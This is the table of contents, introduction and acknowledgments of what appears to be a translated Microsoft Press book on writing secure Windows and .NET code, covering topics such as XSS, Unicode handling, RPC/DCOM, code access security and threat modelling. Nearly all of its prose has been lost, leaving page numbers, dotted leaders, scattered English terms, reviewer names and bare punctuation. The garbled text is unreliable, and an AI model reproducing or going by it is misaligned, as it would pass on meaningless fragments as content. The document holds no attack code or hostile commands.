XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 360
HTML . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 361
XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 362
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 362
. . . . . . . . . . . . . . . . . . . . . . . . . . . . 363
innerText . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 363
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 364
HttpOnly cookie Internet Explorer 6 SP1 . . . . . . . . . . 364
. . . . . . . . . . . . . . . . . . . . . . . . . . . . 366
<FRAME SECURITY> Internet Explorer . . . . . . . . . . . . . . . . . . . . . . . . . 367
ValidateRequest ASP.NET 1.1 . . . . . . . . . . . . . . . . . . . . . . . . . . 367
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 368
, HTML
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 369
XIII
XSS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 370
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
eval() . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
HTTP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 371
ISAPI . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 372
cookie . . . . . . . . . . . . . . . . . . . . . . . . 375
SSL/TLS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 375
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 376
14
377
I18N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 378
Unicode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 378
I18N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 378
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 379
I18N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 380
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 380
LCMapString . . . . . . . . . . . . . . . . . 381
CreateFile . . . . . . . . 381
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 381
MultiByteToWideChar MB_PRECOMPOSED
MB_ERR_INVALID_CHARS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 382
WideCharToMultiByte WC_NO_BEST_FIT_CHARS . . . . . . . . . . . . . . . . . . . . . . . 382
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 385
Unicode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 386
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 386
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 387
I I I

15
389
390
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 391
TCP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 398
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 399
, . . . . . 405
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 405
. . . . . . . . . . . . . . . . . . . 406
. . . . . . . . . . . . . . . . . . . . . . 406

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407
IP . . . . . . . . . . . . . . . 407
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 407
XIV
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 408
IPv6 ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 409
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 410
16
RPC, ActiveX- DCOM
411
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 412
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 413
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 414
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
/robust MIDL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
[range] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 416
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 417
. . . . . . . . . . . . . . . . . . 422
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 422
. . . . . . . . . . . . . . . . 425
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 426
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 427
. . . . . . . . . . . . . . . . . . . . . . . . . . . 428
RPC . . . . . . . . . . . . . . 429
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 431
DCOM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 432
DCOM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 432
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 434
DCOM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 434
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 437
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440
ActiveX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 440
ActiveX . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441
ActiveX,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 441
SFI SFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . 443
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 446
17
447
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 447
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 451
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 459
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 459
, . . . . . . . . . . . . . . . . . . . . . . . . . 461
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 462
18
.NET
463
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 465
: FxCop . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 466
XV
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 467
ASP.NET . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 469
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 469
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 470
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 470
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 471
Assert . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 472
Demand Assert . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 473
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 475
Demand LinkDemand . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 476
LinkDemand . . . . . . . . . . . . . . . . . . . . . 477
SuppressUnmanagedCodeSecurityAttribute: . . . . . . 478
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 479
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 479
XML . . . . . . . 481
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 481
,
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 482
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 483
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 483
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 484

ASP.NET . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 485

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 486
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 487
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 487
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 488
I V

19
491
492
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 492
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 493
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 494
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 495
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 495
. . . . . . . . . . . . . . . . . . . . . . . . . . . . 496
, . . . . . . . . 497
STRIDE . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 497
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 499
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 501
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 510
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 511
XVI
. . . . . . . . . . . . . . . . . . . . . . . . . 527
/ . . . . . . . . . . . . . . . . . . . . . . . . . . . 528
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 529
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 530
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 531
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 531
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 532
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 534
20
535
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 537
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 538
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 538
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 540
: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 543
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 543
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 544
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 544
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 545
21
546
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 547
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 549
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 549
API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 556
Windows Installer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 557
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 558
22
559
. . . . . . . . . . . . . . . . . . . 560
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 560
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 561
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 561
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 561
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 563
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 564
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 564
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 565
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 566
, . . . . . . . . . . . . . . 566
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 566
XVII
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 569
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 578
23
579
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 579
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 580
, . . . . . . . . . . . . . . . . . . . . . . . . . . 580
. . . . . . . . . . . . . . . . . . . . . . . . . . . 581
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 583

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 584
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 585
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 586
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 586
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 586
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 586
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 587
IRP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 589
. . . . . . . . . . . . . . . . . . . . . . . 590
. . . . . . . . . . . . . . . . . . . . . . . . . . . 590
, . . . . 590
CreateProcess . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 591
NULL lpApplicationName . . . . . . . . . . . . . . . . . . 592
lpCommandLine . . . . . . . . 592
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 593
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 593
\Program Files . . . . . . . . 594
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 594
CreateFile . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 596
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 597
EFS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 600
. . . . . . . . . . . . . . . . . . . . . . . . . . . 601
, , . . . . . . . . . . . . . . . 601
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 602
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 602
, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 603
SID . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 603
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 604
_alloca . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 604
ATL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 605
! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 606
XVIII
DLL . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 606
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 607
C/C++ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 608
24

609
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 609
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 610
. . . . . . . . . . . . . . . . . . . . . . . 611

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 611
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 613
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 614
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 614
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 616
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 618
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 618
, , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 620

. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 621
. . . . . . . . . . . . . . . . . . . . 621
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 622
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 623
API-
625
626
API, . . . . . . . . . . . . . . . . . . . . . . . . . . . 627
API, . . . . . . . . . . . . 629
API, . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 630
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 631
API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 631
API, DoS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 632
API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 633
API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 634
636
643
XIX
645
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 645
Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 647
RPC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 647
ActiveX, COM DCOM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 648
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 648
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 648
650
652
653
658
671
2002 . Microsoft
Windows .
, Windows .NET Server 2003.
Windows Security Push ( )
,
,
.
Windows, ,
, Windows
Security Push, Microsoft,
SQL Server, Office, Exchange, Systems Management Server, Visual Studio .NET,
.NET (CLR) .
Windows Security Push (
) , 15 2002 .
,
, ,
.
Microsoft,
, :
, .
.
,
, ,
.
, . ,
.
.
.
, .
, :
, ,
, ,
.
:
, , .
, ,
.
Web, ,
.
XXI
, , ,

.
.
!
, .

, .

. ,
, .
: .
,
,
.
, ,

. ,
,
, , .
, , ,
, ,
, . ,
Microsoft Windows .NET Server 2003 ,
, ,
. .

, ,
. , Web Win32
Microsoft .NET Framework.
, ,
.
, Microsoft,
. ,
Microsoft,
, .
, , Windows
. , ACL,
Everyone, World Writable UNIX
,
.
XXII

. 1 (
14) , ,
,
.
2 3. 2
( 514) ,
(
) . 3
( 15 18),
.NET.
4 ( 19 24).
, : ,
, .
23 ,
, .
5 API,
, ,
,
.
,
,
.
. , ,
.

Web Microsoft
Press, (http://www.microsoft.com/mspress/books/5957.asp).
, Companion Content
. Web Companion Content
Microsoft Press
Support. ,
. .
My Documents\Microsoft Press\Secureco2.
.

C C++; Microsoft Visual
Studio .NET,
, Microsoft Visual C++ 6.0. Perl
ActiveState Perl 5.6 ActivateState Visual Perl 1.0 (http://www.activestate.com).
XXIII
Microsoft VBScript JScript Windows Scripting Host,

Windows 2000 . SQL
Microsoft SQL Server 2000. , Visual Basic .NET Visu
al C# Visual Studio .NET.

Windows 2000,
. Safer
7 UTF8 11 Windows XP Windows .NET Server.
,
.

, ,
. Microsoft Press

http://mspress.microsoft.com/support/.
,
Microsoft Press http://www.microsoft.com/mspress/
support/search.asp.
,
.
, , .
Microsoft Press,
(Danielle Bird) ,
, (Devon Musgrave)
,
(Brian Johnson) ,
. (Kerri DeVault)
(Rob Nance) .

. Microsoft:
(Saji Abraham), (mit Akkus ), (Doug Bayer),
(Tina Bird), (Mike Blaszczak), (Grant Bolitho),
(Christopher Brumme), (Neill Clift),
(David Cross), (Scott Culp), (Mike Danseglio),
(Bhavesh Doshi), (Ramsey Dow), (Werner Dreyer),
(Kedar Dubhashi), (Patrick Dussud), (Vadim
Eydelman), (Scott Field), (Cyrus Gray),
(Brian Grunkemeyer), (Caglar Gunyakti), (Ron Jacobs),
(Jesper Johansson), (Willis Johnson),
(Loren Kohnfelder), (Sergey Kuzin), (Mike Lai),
(Bruce Leban), Yung (YungShin Lin) Bala ,
XXIV
(Steve Lipner), (Eric Lippert), (Matt Lyons),

(Erik Olson), (Dave Quick), (Art Shelest),
(Daniel Sie), (Frank Swiderski), (Matt Thomlinson),
(Chris Walker), (Landy Wang), (Jonathan
Wilkins) (Mark Zbikowski).
Windows ,
,
!
,
,
. (Brandon Bray)
(Raymond Fowkes)
. (Dave Ross), (Tom Gallagher)
(Richie Lai) Web,
. (John McConnell),
(Mohammed ElGammal) (Julie Bennett)
,
. .NET
, ;
. (Adrian Oney)
(Peter Viscarola) Open Systems Resources Inc.
.
(J.C. Cannon)
. , (Ken Jones), (Todd Stedl), (David
Wright), (Richard Carey) (Everett McKay)
, .

(Ramsey Dow)
PowerPoint (Neill Clift).
,
SO_EXCLUSIVEADDR, , ,
Microsoft Knowledge Base.

.
,
: (Eli Allen), (John Biccum),
(Thomas Deml), (Monica EnePietrosanu),
(Sean Finnegan), (Tim Fleehart), (Damian Haase),
(David Hubbard), (Louis Lafreniere),
(Brian LaMacchia), (John Lambert), (Lawrence Lan
dauer), (Paul Leach), (Terry Leeper), (Rui Maximo),
(Daryl Pecelj), (Jon Pincus), Rain
Forest Puppy, (Fritz Sands), (Eric Schultze),
(Alex Stockton), (Hank Voight), (Richard Ward),
(Richard Waymire) (Mark Zhou).
XXV
, Microsoft, ,
. (Peter Gutmann),
(Steve Hayr) Accenture, (Christo
pher W. Klaus) Internet Security Systems, (John Pescatore)
Gartner Inc., (Herbert H. Thompson)
(James A. Whittaker) Florida Tech , , (Chris Wysopal)
Weld Pond @Stake.
: Microsoft
,
. !
,
,
,
,
.
,

,
, ,
.
: Microsoft.com
, ,
.
, ,
, :
, ,
. ,
. ,
90. , 850
(Steve McConnell) (Microsoft Press, 1993)
.
, ,
.
.
.
, , ,
AutoPC ,
. , ,
,
